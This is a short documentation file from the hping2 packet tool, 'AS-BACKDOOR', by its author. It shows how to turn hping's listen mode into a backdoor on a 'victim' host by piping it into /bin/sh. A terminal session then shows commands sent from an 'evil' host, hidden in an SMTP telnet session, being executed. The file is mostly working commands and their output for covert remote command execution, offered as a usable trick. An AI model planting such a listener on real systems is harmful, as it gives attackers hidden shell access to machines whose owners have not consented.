File:  [ELWIX - Embedded LightWeight unIX -] / embedaddon / hping2 / docs / AS-BACKDOOR
Revision 1.1.1.1 (vendor branch)
Tue Feb 21 22:11:37 2012 UTC (13 years, 6 months ago) by misho
Branches: hping2, MAIN
CVS tags: v2_0_0rc3p7, v2_0_0rc3p5, v2_0_0rc3p4, v2_0_0rc3p0, v2_0_0rc3, HEAD
hping2

hping can be used as a backdoor. Just try the -9 (--listen) option
and put it in a pipe with /bin/sh:

Put hping in listen mode on the victim host.

victim# hping -I eth0 -9 mysign | /bin/sh

Every packet that contains "mysign" will be processed by hping;
all the bytes that follow "mysign" in the packet will be dumped
to standard output, so I'll be able to exec commands
using any protocol. For example, I can use the smtpd
to exec 'ls' on the victim.

evil$ telnet victim 25

Trying 192.168.1.1...
Connected to nano (192.168.1.1).
Escape character is '^]'.
220 nano.marmoc.net ESMTP Sendmail
mysignls;

On the victim you will see:

victim# hping -I eth0 -9 mysign | /bin/sh
hping2 listen mode
bin   cdrom  etc     home  local-home  mnt   root  tmp  var
boot  dev    export  lib   lost+found  proc  sbin  usr
: command not found

As you can see I used 'ls;' since otherwise the shell would receive
just ls^M. The ";" forces the command execution (at least with bash and zsh;
check your shell for more information).

This works with all kinds of valid, unfiltered IP packets; the higher
level protocol does not matter.

antirez <antirez@invece.org>
